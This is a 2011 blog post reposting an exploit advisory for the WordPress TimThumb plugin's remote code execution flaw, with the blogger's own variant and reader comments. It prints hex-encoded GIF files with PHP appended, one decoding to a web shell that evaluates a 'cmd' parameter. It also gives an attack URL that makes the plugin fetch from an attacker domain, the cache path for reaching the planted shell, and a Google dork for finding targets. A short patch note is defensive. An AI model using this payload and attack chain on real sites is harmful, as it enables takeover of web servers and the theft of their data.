Wednesday, August 3, 2011

WordPress TimThumb Plugin - Remote Code Execution

This plugin has a lot of variants. In the advisory made by MaXe, a temp folder is not found, but I found a lot of themes that include a temp folder that can be exploited this way:

Example: I first crafted a file that contains:


\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x00\x00\x00\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x4c\x01\x00\x3b\x3C\x3F\x70\x68\x70\x20\x70\x68\x70\x69\x6E\x66\x6F\x28\x29\x3B\x20\x3F\x3E



Edit: MaXe reported that I have trash in the output because my payload doesn't follow JPEG standards.

(A black dot in a GIF File + phpinfo();

Here I am uploading the file with the vulnerability:




Cache folder has our file:




Executing the script:







# Exploit Title: WordPress TimThumb Plugin - Remote Code Execution
# Google Dork: inurl:timthumb ext:php -site:googlecode.com -site:google.com
# Date: 3rd August 2011
# Author: MaXe
# Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php
# Version: 1.32
# Screenshot: See attachment
# Tested on: Windows XP + Apache + PHP (XAMPP)


WordPress TimThumb (Theme) Plugin - Remote Code Execution


Versions Affected:
1.* - 1.32 (Only version 1.19 and 1.32 were tested.)
(Version 1.33 did not save the cache file as .php)


Info: (See references for original advisory)
TimThumb is an image resizing utility, widely used in many WordPress themes.


External Links:
http://www.binarymoon.co.uk/projects/timthumb/
http://code.google.com/p/timthumb/

Credits:
- Mark Maunder (Original Researcher)
- MaXe (Indepedendent Proof of Concept Writer)


-:: The Advisory ::-
TimThumb is prone to a Remote Code Execution vulnerability, due to the
script does not check remotely cached files properly. By crafting a
special image file with a valid MIME-type, and appending a PHP file at
the end of this, it is possible to fool TimThumb into believing that it
is a legitimate image, thus caching it locally in the cache directory.


Attack URL: (Note! Some websites uses Base64 Encoding of the src GET-request.)
http://www.target.tld/wp-content/themes/THEME/timthumb.php?src=http://blogger.com.evildomain.tld/pocfile.php

Stored file on the Target: (This can change from host to host.)
1.19: http://www.target.tld/wp-content/themes/THEME/cache/md5($src);
1.32: http://www.target.tld/wp-content/themes/THEME/cache/external_md5($src);
md5($src); means the input value of the 'src' GET-request - Hashed in MD5 format.


Proof of Concept File:
\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00
\xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00
\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02
\x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65
\x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D
\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00

(Transparent GIF +



-:: Solution ::-
Update to the latest version 1.34 or delete the timthumb file.

NOTE: This file is often renamed and you should therefore issue
a command like this in a terminal: (Thanks to rAWjAW for this info.)
find . | grep php | xargs grep -s timthumb


Disclosure Information:
- Vulnerability Disclosed (Mark Maunder): 1st August 2011
- Vulnerability Researched (MaXe): 2nd August 2011
- Disclosed at The Exploit Database: 3rd August 2011

3 comments:

  1. Hi can you tell me how you made this Proof of concept file and what is \x something something.. and how you used it in php.If possible can you mail me the source at anu.returns@gmail.com

    ReplyDelete
  2. The advisory I wrote is not broken, it was extensively tested as shown in the video I also made, along with a blog entry: http://www.exploit-db.com/wordpress-timthumb-exploitation/

    Your GIF file on the other hand, does not follow the standards completely for GD to process it, hence the reason it becomes broken.

    Also, different versions of TimThumb, process the incoming files differently. Including custom modifications developers may have made, as there was no "temp" directory mentioned, in any of the scripts I tested.

    ReplyDelete
  3. MaXe, first of all it's an honor to have someone from exploit-db commenting on my blog, and I am sorry for the confusion. I modified the blog post. I didn't see that blog entry, so I didn't know there was a lot of different modifications of the plugin.

    Thanks

    ReplyDelete